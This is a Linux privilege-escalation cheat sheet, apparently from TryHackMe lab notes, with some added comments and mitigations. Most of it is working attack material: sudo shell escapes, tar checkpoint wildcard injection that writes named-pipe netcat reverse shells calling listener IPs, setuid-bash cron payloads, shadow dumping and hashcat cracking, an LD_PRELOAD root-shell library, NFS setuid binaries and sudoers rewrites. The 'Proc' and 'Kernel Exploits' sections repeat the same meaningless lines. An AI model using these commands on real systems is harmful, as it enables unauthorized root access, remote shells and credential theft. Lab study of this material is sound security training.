TryHackMe

Look For Interesting files

# Case-insensitive search for "pass"; with no path argument grep reads stdin,
# so this is meant to be fed a file or combined with -r <dir>.
grep -i pass

Sudo Permission

# Lists the sudo rules that apply to the current user; NOPASSWD entries and
# rules naming interpreters, editors or "ALL" are the ones to review.
sudo -l

If no password is needed
# {username} and {program} are placeholders taken from the sudo -l output:
# run the permitted program as the permitted user without a password...
sudo -u {username} {program}
# ...or, when the rule is ALL, switch straight to a root shell.
sudo su


# Each line below relies on a sudo rule that allows the named program; the
# program is then used to read a protected file or hand back a shell.
# apache2 parses the file as a config and prints the offending line in its
# syntax error, which discloses one line of /etc/shadow.
sudo apache2 -f /etc/shadow
# find's -exec runs /bin/sh under sudo's privileges for each match.
sudo find /bin -name nano -exec /bin/sh \;
# awk's system() call in a BEGIN block starts a shell before any input is read.
sudo awk 'BEGIN {system("/bin/sh")}'
# A one-line NSE (Lua) script that executes a shell, run through nmap.
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
# vim's -c runs an ex command; "!sh" launches a shell.
sudo vim -c '!sh'
# Mitigation: sudo rules should name specific, non-interactive binaries with
# fixed arguments; editors, interpreters, find and awk all yield a shell.

GTFOBins


Note: if a password is required, look for a stored password first.

SUID/GUID/Capabilities

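# Setuid enumeration: two equivalent ways of listing setuid files, a broad
# sweep for text files, then a long listing of root-owned setuid files saved
# to /tmp/suid for later review.
find / -user root -perm /4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Broad, but catches notes and configuration left as plain text.
find / -type f -name '*.txt' 2>/dev/null
# -exec needs an escaped ';' terminator. The original "{};" was a syntax
# error for find, so the command failed and /tmp/suid was created empty.
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null > /tmp/suid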

# Lists files carrying Linux capabilities (e.g. cap_setuid); these grant
# root-equivalent power without a setuid bit, so review them like setuid files.
getcap -r / 2>/dev/null

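# Setuid files with a full -ls listing.
find / -type f -perm -04000 -ls 2>/dev/null
# Shows which files the setuid binary opens or fails to find at start-up.
# The original line was missing its closing quote, so the shell would have
# waited for more input instead of running grep.
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
# Installed package version, e.g. to compare nginx against known advisories.
dpkg -l | grep nginx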

CRONTAB

# Tar wildcard ("checkpoint") injection: presumably a cron job archives this
# directory with tar and an unquoted *, so the two file names created below
# are parsed by tar as options and the first one runs shell.sh.
cd /var/www/html
# Reverse shell through a named pipe; 10.8.3.38:4443 is the listener address
# used in the lab.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.3.38 4443 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
# Mitigation: scheduled scripts should give tar explicit paths, or put "--"
# before any wildcard; detection: file names beginning with "--" in web roots.

# Lists system cron entries to find jobs that run a script this user can write.
cat /etc/crontab
# Replaces the script body (presumably overwrite.sh is referenced from the
# crontab); when cron runs it as root it leaves a setuid copy of bash in /tmp.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
# Mitigation: scripts referenced from cron must be root-owned and not
# group/world-writable; detection: setuid binaries appearing under /tmp.

# Tar checkpoint injection again, this time against a job that presumably
# archives /home/user; the payload is the setuid-bash copy from above.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
touch /home/user/--checkpoint=1
# The backslash keeps "sh runme.sh" as one file name with an embedded space.
touch /home/user/--checkpoint-action=exec=sh\ runme.sh


# Wildcard (tar checkpoint) injection, run from the current directory.
# Reverse shell through a named pipe; 10.17.10.67:8888 is the lab listener.
echo "mkfifo /tmp/lhennp; nc 10.17.10.67 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
# Empty files whose names tar parses as options when invoked with an
# unquoted wildcard; the first one executes shell.sh.
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Proc (Processes)

sched_debug
proc/self/cmdline
proc/self/fg

Kernel Exploits:

sched_debug
proc/self/cmdline
proc/self/fg

Stored Passwords (Config Files):

# Client configuration files that commonly embed credentials in clear text.
cat /home/user/myvpn.ovpn
cat /home/user/.irssi/config | grep -i passw
# Mitigation: keep such files readable only by their owner and prefer
# credential files referenced from the config over inline passwords.

Stored Passwords (History)

# Shell history retains passwords that were passed on the command line.
cat ~/.bash_history | grep -i passw
# Mitigation: supply secrets via stdin or environment rather than argv, and
# use HISTCONTROL/HISTIGNORE to keep such commands out of the history file.

Weak File Permissions

//To detect 
# /etc/shadow should be readable only by root (and the shadow group);
# any wider permission shown here is the finding.
ls -la /etc/shadow

//To Exploit 
# Dumps the account list and, if the permissions above allow it, the
# password hashes; the two files are combined in the cracking step below.
cat /etc/passwd
cat /etc/shadow

//To Crack
# <PASSWORD-FILE> and <SHADOW-FILE> are placeholders for the copied passwd
# and shadow files; unshadow (John the Ripper) merges them one line per user.
unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
# -m 1800 is hashcat's sha512crypt mode ($6$ hashes); rockyou.txt is the wordlist.
hashcat -m 1800 unshadowed.txt rockyou.txt -Os

SSH Keys

//To Find
# Looks for SSH trust material readable from this account; a private key
# that is readable by other users is the finding.
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null

//To Exploit
# ssh refuses a key file with loose permissions, hence the chmod first;
# <ip> is a placeholder for the target host.
chmod 400 id_rsa
ssh -i id_rsa root@<ip>
# Mitigation: keys should be mode 0600 and owned by their user, and direct
# root login over SSH should be disabled (PermitRootLogin no).

Sudo (LD_PRELOAD)

Open a text editor and type:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

/* Runs when this shared object is loaded through LD_PRELOAD into a program
 * started by sudo: it removes the preload so children are not affected,
 * takes root's gid and uid, and spawns a root shell via system().
 * Only reachable when sudoers preserves LD_PRELOAD (env_keep); sudo's
 * default env_reset strips the variable before the program starts. */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}


# Builds the shared object; -nostartfiles presumably keeps the toolchain's
# own _init out of the link so the one defined in x.c is used — confirm.
gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles
# Works only when sudoers keeps LD_PRELOAD in the environment (env_keep);
# with the default env_reset the variable is dropped and apache2 runs normally.
sudo LD_PRELOAD=/tmp/x.so apache2

NFS no_root_squash

# Shows NFS exports; a share exported with no_root_squash lets a remote root
# user create root-owned (including setuid) files on it.
# Mitigation: keep the default root_squash and export only to trusted hosts.
cat /etc/exports

1. Open command prompt and type: showmount -e 10.10.65.181
2. In command prompt type: mkdir /tmp/1
3. In command prompt type: mount -o rw,vers=2 10.10.65.181:/tmp /tmp/1
In command prompt type:
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
4. In command prompt type: gcc /tmp/1/x.c -o /tmp/1/x
5. In command prompt type: chmod +s /tmp/1/x

Writable sudoers

# Requires /etc/sudoers to be writable by this user; appends a rule granting
# www-data passwordless sudo for every command.
echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers
# Variant that stages the same change in a script (presumably /tmp/update is
# later run by a privileged job); it loosens and then restores the file mode.
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
# Mitigation: /etc/sudoers must be root-owned, mode 0440, and edited only via
# visudo; monitor /etc/sudoers and /etc/sudoers.d for unexpected changes.
